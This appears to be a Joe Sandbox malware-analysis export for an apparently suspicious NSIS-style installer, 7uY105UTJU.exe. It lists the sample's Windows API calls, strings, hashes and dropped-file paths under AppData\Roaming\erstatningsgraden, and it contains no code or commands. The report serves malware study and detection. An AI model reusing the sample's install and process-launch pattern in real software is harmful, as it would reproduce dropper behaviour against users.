Associated: 00000000.00000002.2173294469.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173406182.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7uY105UTJU.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: faa9f1bbc6a73408ed15535010d366895e2d742fa65bef251b9024de670fa5bb
Instruction ID: 186c68f4495094c0cebc3eb7279f68ffc90812dad8dfd9e689695b78415bb769
Opcode Fuzzy Hash: faa9f1bbc6a73408ed15535010d366895e2d742fa65bef251b9024de670fa5bb
Instruction Fuzzy Hash: 43A00176544A04ABCE12EB50EF4990ABB62BBA4B01B618879A285514388B325921EB19

Function 00401FA9 Relevance: 1.3, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 004055DC: lstrlenW.KERNEL32(antholite,00000000,00424620,762323A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,antholite,00000000,00424620,762323A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
Part of subcall function 004055DC: lstrcatW.KERNEL32(antholite,0040341D,0040341D,antholite,00000000,00424620,762323A0), ref: 00405637
Part of subcall function 004055DC: SetWindowTextW.USER32(antholite,antholite), ref: 00405649
Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697

Part of subcall function 00405B3A: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?, abbina",?), ref: 00405B63
Part of subcall function 00405B3A: CloseHandle.KERNEL32(?,?,?, abbina",?), ref: 00405B70

CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FF0

Part of subcall function 004069F6: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406A07
Part of subcall function 004069F6: GetExitCodeProcess.KERNEL32(?,?), ref: 00406A29

Part of subcall function 0040649E: wsprintfW.USER32 ref: 004064AB

Memory Dump Source

Source File: 00000000.00000002.2173266507.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2173253191.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173281024.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173406182.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7uY105UTJU.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
String ID:
API String ID: 2972824698-0
Opcode ID: 23aa4ee629d2d375094aa14ebaeeae63623eaa73686822291d3629d93c53ad1e
Instruction ID: 72ab4701d282d41bfb99937ccb951c9b3d992b5a19319da95f503844dddfcbd3
Opcode Fuzzy Hash: 23aa4ee629d2d375094aa14ebaeeae63623eaa73686822291d3629d93c53ad1e
Instruction Fuzzy Hash: EEF0F032804015ABCB20BBA199849DE72B5CF00318B21413FE102B21D1C77C0E42AA6E

Non-executed Functions

Function 004049C7 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404A16
SetWindowTextW.USER32(00000000,?), ref: 00404A40
SHBrowseForFolderW.SHELL32(?), ref: 00404AF1
CoTaskMemFree.OLE32(00000000), ref: 00404AFC
lstrcmpiW.KERNEL32(: Completed,0042CA68,00000000,?,?), ref: 00404B2E
lstrcatW.KERNEL32(?,: Completed), ref: 00404B3A
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B4C

Part of subcall function 00405B9B: GetDlgItemTextW.USER32(?,?,00000400,00404B83), ref: 00405BAE

Part of subcall function 00406805: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\7uY105UTJU.exe",76233420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00406868
Part of subcall function 00406805: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406877
Part of subcall function 00406805: CharNextW.USER32(?,"C:\Users\user\Desktop\7uY105UTJU.exe",76233420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040687C
Part of subcall function 00406805: CharPrevW.USER32(?,?,76233420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040688F

GetDiskFreeSpaceW.KERNEL32(0042AA38,?,?,0000040F,?,0042AA38,0042AA38,?,00000001,0042AA38,?,?,000003FB,?), ref: 00404C0F
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404C2A

Part of subcall function 00404D83: lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E24
Part of subcall function 00404D83: wsprintfW.USER32 ref: 00404E2D
Part of subcall function 00404D83: SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E40

Strings

C:\Users\user\AppData\Roaming\erstatningsgraden, xrefs: 00404B17
A, xrefs: 00404AEA
: Completed, xrefs: 00404B28, 00404B2D, 00404B38

Memory Dump Source

Source File: 00000000.00000002.2173266507.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2173253191.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173281024.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173406182.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7uY105UTJU.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: : Completed$A$C:\Users\user\AppData\Roaming\erstatningsgraden
API String ID: 2624150263-3870413507
Opcode ID: aab1ff152b07609d5ccd452d97b16b322b3ddb3b1e57e49f69f3ed37cd316d4d
Instruction ID: 8a45afd3ee22384d80319c7ed67abe130e578f1d2b392c1e8909742cb30e522b
Opcode Fuzzy Hash: aab1ff152b07609d5ccd452d97b16b322b3ddb3b1e57e49f69f3ed37cd316d4d
Instruction Fuzzy Hash: FCA192B1900208ABDB11EFA5DD45BAFB7B8EF84314F11803BF611B62D1D77C9A418B69

Function 004021AF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(004085E8,?,00000001,004085D8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040222E

Strings

C:\Users\user\AppData\Roaming\erstatningsgraden\Ubekymret, xrefs: 0040226E

Memory Dump Source

Source File: 00000000.00000002.2173266507.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2173253191.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173281024.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173406182.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7uY105UTJU.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Roaming\erstatningsgraden\Ubekymret
API String ID: 542301482-3838232433
Opcode ID: 54fcaebf65a6d80a769d2ffe25eeb1568fba929b3fba522b5b89cb6b807999ae
Instruction ID: f0c409d0c9855dc16f3492d495f607d4fcaf843261c47ee8c1995525671fe781
Opcode Fuzzy Hash: 54fcaebf65a6d80a769d2ffe25eeb1568fba929b3fba522b5b89cb6b807999ae
Instruction Fuzzy Hash: 76411471A00208AFCB40DFE4C989EAD7BB5FF48308B20457AF515EB2D1DB799982CB54

Function 00402910 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291F

Memory Dump Source

Source File: 00000000.00000002.2173266507.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2173253191.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173281024.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173406182.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7uY105UTJU.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: f7eec81d6910abfa52e209e80917fba1586809f9bcb970d7ef1d97902b1d379f
Instruction ID: 4f8030157269cd498ea314d5a86e386b0cfb994e1dea9c94a4400a3869289cfc
Opcode Fuzzy Hash: f7eec81d6910abfa52e209e80917fba1586809f9bcb970d7ef1d97902b1d379f
Instruction Fuzzy Hash: 17F08C71A04104AAD701EBE4EE499AEB378EF14324F60457BE102F31E0DBB85E159B2A

Function 00406DC6 Relevance: .3, Instructions: 334COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2173266507.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2173253191.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173281024.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173406182.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7uY105UTJU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca9fc840679c4677ea5dd763a2b97f011fd48deb17cd4c9d43ec117c62889360
Instruction ID: a5eb8001d75a17d38d83411349fde439c8a9064fda1b18d7f978e280ae41e255
Opcode Fuzzy Hash: ca9fc840679c4677ea5dd763a2b97f011fd48deb17cd4c9d43ec117c62889360
Instruction Fuzzy Hash: ACE19C71A04709DFCB24CF58C880BAABBF1FF45305F15852EE496A72D1E378AA51CB05

Function 0040759D Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2173266507.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2173253191.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173281024.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173406182.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7uY105UTJU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5db23d3e625216a1972a1fea7a98b9ee98c1df0b240da8e2d6c4f39054d3f9c6
Instruction ID: e409ec8ffb443055957628c835c79614664982182129ebc37b3e11cb9bcd83e5
Opcode Fuzzy Hash: 5db23d3e625216a1972a1fea7a98b9ee98c1df0b240da8e2d6c4f39054d3f9c6
Instruction Fuzzy Hash: ECC14772E04219CBCF18CF68C4905EEBBB2BF98354F25866AD85677380D7346942CF95

Function 00404F43 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404F5B
GetDlgItem.USER32(?,00000408), ref: 00404F66
GlobalAlloc.KERNEL32(00000040,?), ref: 00404FB0
LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404FC7
SetWindowLongW.USER32(?,000000FC,00405550), ref: 00404FE0
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FF4
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405006
SendMessageW.USER32(?,00001109,00000002), ref: 0040501C
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405028
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 0040503A
DeleteObject.GDI32(00000000), ref: 0040503D
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405068
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405074
SendMessageW.USER32(?,00001132,00000000,?), ref: 0040510F
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040513F

Part of subcall function 0040450B: SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519

SendMessageW.USER32(?,00001132,00000000,?), ref: 00405153
GetWindowLongW.USER32(?,000000F0), ref: 00405181
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040518F
ShowWindow.USER32(?,00000005), ref: 0040519F
SendMessageW.USER32(?,00000419,00000000,?), ref: 0040529A
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052FF
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405314
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405338
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405358
ImageList_Destroy.COMCTL32(?), ref: 0040536D
GlobalFree.KERNEL32(?), ref: 0040537D
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053F6
SendMessageW.USER32(?,00001102,?,?), ref: 0040549F
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004054AE
InvalidateRect.USER32(?,00000000,00000001), ref: 004054D9
ShowWindow.USER32(?,00000000), ref: 00405527
GetDlgItem.USER32(?,000003FE), ref: 00405532
ShowWindow.USER32(00000000), ref: 00405539

Strings

M, xrefs: 004050F7
, xrefs: 00405511
N, xrefs: 004051D8

Memory Dump Source

Source File: 00000000.00000002.2173266507.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2173253191.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173281024.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173406182.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7uY105UTJU.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: 14683326fe5d0e21a3b01d942e888f99a0d9647cceadcd168bf81575faddcc86
Instruction ID: 91097811874ce85ba3cc7540bcf7dd58db25a3d6f071223140e4d1ec27d7ea12
Opcode Fuzzy Hash: 14683326fe5d0e21a3b01d942e888f99a0d9647cceadcd168bf81575faddcc86
Instruction Fuzzy Hash: 6C029C70900608AFDF20DF94DD85AAF7BB5FB85314F10817AE611BA2E1D7798A41CF58

Function 00404695 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404733
GetDlgItem.USER32(?,000003E8), ref: 00404747
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404764
GetSysColor.USER32(?), ref: 00404775
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404783
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404791
lstrlenW.KERNEL32(?), ref: 00404796
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004047A3
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004047B8
GetDlgItem.USER32(?,0000040A), ref: 00404811
SendMessageW.USER32(00000000), ref: 00404818
GetDlgItem.USER32(?,000003E8), ref: 00404843
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404886
LoadCursorW.USER32(00000000,00007F02), ref: 00404894
SetCursor.USER32(00000000), ref: 00404897
LoadCursorW.USER32(00000000,00007F00), ref: 004048B0
SetCursor.USER32(00000000), ref: 004048B3
SendMessageW.USER32(00000111,00000001,00000000), ref: 004048E2
SendMessageW.USER32(00000010,00000000,00000000), ref: 004048F4

Strings

N, xrefs: 00404831
: Completed, xrefs: 00404872

Memory Dump Source

Source File: 00000000.00000002.2173266507.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2173253191.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173281024.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173406182.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7uY105UTJU.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: : Completed$N
API String ID: 3103080414-2140067464
Opcode ID: 04e13e5971a3aaf2d7c3f6bec99ed017c89c89abbf6057be99a5caf0d4384f9a
Instruction ID: 3ad42440e7936429012ccc374b67200ab01768f99e4ad58672f49272ac14a637
Opcode Fuzzy Hash: 04e13e5971a3aaf2d7c3f6bec99ed017c89c89abbf6057be99a5caf0d4384f9a
Instruction Fuzzy Hash: 2E6181B1900209BFDB10AF60DD85EAA7B69FB84315F00853AFA05B62D0C779A951DF98

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00433700,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.2173266507.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2173253191.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173281024.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173406182.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7uY105UTJU.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: f8b3db801d2c504d9e2de6f85bac4b8fdc05036872983a9c428bf394377a2a15
Instruction ID: eca0ad76d85821e0a7fbe67f508e5060b260b918cc65b70bf06bca200ae74670
Opcode Fuzzy Hash: f8b3db801d2c504d9e2de6f85bac4b8fdc05036872983a9c428bf394377a2a15
Instruction Fuzzy Hash: 2F418B71800209AFCB058FA5DE459AFBFB9FF45314F00802EF591AA1A0C738EA54DFA4

Function 0040619D Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406338,?,?), ref: 004061D8
GetShortPathNameW.KERNEL32(?,00430108,00000400), ref: 004061E1

Part of subcall function 00405FAC: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBC
Part of subcall function 00405FAC: lstrlenA.KERNEL32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FEE

GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 004061FE
wsprintfA.USER32 ref: 0040621C
GetFileSize.KERNEL32(00000000,00000000,00430908,C0000000,00000004,00430908,?,?,?,?,?), ref: 00406257
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406266
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040629E
SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,0042FD08,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062F4
GlobalFree.KERNEL32(00000000), ref: 00406305
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040630C

Part of subcall function 00406047: GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\7uY105UTJU.exe,80000000,00000003), ref: 0040604B
Part of subcall function 00406047: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D

Strings

[Rename], xrefs: 00406286, 00406298
%ls=%ls, xrefs: 00406212

Memory Dump Source

Source File: 00000000.00000002.2173266507.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2173253191.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173281024.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173406182.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7uY105UTJU.jbxd

